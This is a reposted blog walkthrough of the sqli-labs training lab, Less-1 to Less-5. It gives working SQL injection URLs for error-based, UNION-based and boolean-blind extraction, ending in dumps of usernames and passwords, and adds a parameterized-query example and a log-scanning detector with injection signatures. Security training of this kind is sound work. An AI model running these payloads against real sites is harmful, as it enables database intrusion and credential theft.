sqli-labs Walkthrough: Less-1 to Less-5

Posted by Riy

Editor's note: this article was compiled by the editors of cha138.com (小常识网); it covers the sqli-labs Less-1 to Less-5 walkthrough and is offered for reference.

Foreword:

It has been a long time since I did any manual injection. I was asked about it and found I had forgotten everything, so I set aside some time to refresh my memory by going back through sqli-labs.

Less-1 (GET single-quote string injection)

# Entering a single quote produces an error
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

# Determine the number of columns
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

# UNION query to find which columns are displayed on the page
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

# Query the database names
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

# Query the table names
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

# Enumerate the columns
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

# Dump the values
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

Less-2 (GET integer injection)

# Observe how the page changes
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
# Determine the number of columns
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
# UNION query to find the displayed columns
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
# Enumerate databases
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
# Enumerate tables
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
# Enumerate columns
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
# Dump the values
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3 (GET single-quote variant string injection)

# Check the page error
http://192.168.1.115/sqli-labs/Less-2/?id=1'
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
# Determine the number of columns
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
# UNION query to find the displayed columns
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
# Enumerate databases
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
# Enumerate tables
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
# Enumerate columns
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
# Dump the values
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

Less-4 (GET double-quote string injection)

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

Read the error message: the value is closed with a double quote and a right parenthesis; the rest follows the same UNION query procedure as above.
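Less-1 through Less-4 all share one root cause: the id parameter is spliced into the query text, so whatever closes the surrounding literal (a quote, a quote plus parenthesis, or nothing at all for the integer case) hands the rest of the input to the SQL parser. The following is an added example, not code from the lab or from this post; it rebuilds the Less-1 shape on an in-memory SQLite table with constructed rows (SQLite's `-- ` comment stands in for MySQL's `#`) and places the parameterized form beside it to show that binding the value, rather than filtering it, is what stops the UNION probe.

```python
import sqlite3

# Constructed stand-in for the lab's users table (example rows, not the lab's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return conn

def lookup_vulnerable(conn, user_id):
    # Less-1 shape: the id value is spliced inside single quotes, so a quote in the
    # input closes the literal and the remainder of the input is parsed as SQL.
    sql = "SELECT id, username, password FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # Hardened form: the driver binds the value and it never reaches the parser,
    # so quotes, UNION and comment markers inside it are only characters to compare.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()

# The Less-1 column-count probe from the walkthrough, with "-- " in place of MySQL's "#".
UNION_PROBE = "1000' union select 1,2,3 -- "

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, UNION_PROBE))     # [(1, 2, 3)]: the attacker-chosen row comes back
    print(lookup_parameterized(db, UNION_PROBE))  # []: no user has that literal id
```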

Less-5 (boolean-based blind injection)

# Determine the database version; left(code, 1) takes 1 character from the left of the code field
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

# Determine the length of the database name with length(); binary search makes this faster
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

# Guess the current database name; left(code, 1) takes 1 character from the left of the code field, and extending the prefix up to the name's length reveals the whole database name
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'r' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'t' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)='s' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'d' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'f' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)='e' %23
...

# Determine the number of tables; count() counts the records in a table and returns the number of rows matching the condition.
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0  %23

# Determine the length of a table name; LIMIT forces a SELECT to return a specified number of records.
// SELECT * FROM table LIMIT 5,10; // retrieves rows 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

# Guess the table name character by character; substr(string,start,length): string is the string to cut from, start the starting position, length the number of characters to take.
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
... and so on

# Determine the number of columns
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')>0 %23

# Determine the length of a column name
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select  column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1)) > 0 %23

# Guess the column names character by character
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),1,1))>79  %23

# Determine the data
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79  %23
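From the defender's side, the Less-5 procedure has a distinctive footprint: every character is recovered through a separate request carrying `and length(...)`, `and left(...)` or `and ascii(substr(...))`, usually with an `information_schema` subquery, so one client issues dozens of near-identical GETs to the same path. The following is an added example, not from the post or the lab: it parses constructed Common Log Format lines (a hypothetical sample, including probes shaped like the ones above) with constructed signature regexes and flags a client once it trips them a few times, which is the chattiness that blind extraction cannot avoid.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed signatures for the probe shapes used in Less-1 to Less-5: comparison
# probes on length()/ascii()/left()/substr(), information_schema reads, and
# UNION-based column enumeration. They run on URL-decoded query-string values.
SIGNATURES = {
    "blind-compare": re.compile(r"\band\s+(?:length|ascii|left|substr)\s*\(", re.I),
    "schema-read": re.compile(r"\binformation_schema\.", re.I),
    "union-select": re.compile(r"\bunion\s+select\b", re.I),
}
# Boolean-blind extraction costs one request per guessed character or bit, so a
# client tripping a signature this often in one log slice is treated as a scan.
SCAN_THRESHOLD = 4

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def match_signatures(url):
    """Names of the signatures matched by any decoded query value of url."""
    hits = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)

def scan_log(lines):
    """Return (flagged (client, url, hits) tuples, clients at or over SCAN_THRESHOLD)."""
    flagged, per_client = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        client, url, _status = m.groups()
        hits = match_signatures(url)
        if hits:
            flagged.append((client, url, hits))
            per_client[client] += 1
    scanners = sorted(c for c, n in per_client.items() if n >= SCAN_THRESHOLD)
    return flagged, scanners

# Constructed sample: one benign request, then a Less-5-style blind probe sequence.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-labs/Less-5/?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5%20%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20length(database())>5%20%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20length(database())>10%20%23 HTTP/1.1" 200 480',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>80%20%23 HTTP/1.1" 200 512',
]
```

Running `scan_log(SAMPLE_LOG)` flags the four probe lines and reports 10.0.0.9 as a scanner; the differing response size on the third line (480 versus 512 bytes) is the true/false page difference the blind technique reads, and is itself a useful field to alert on.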
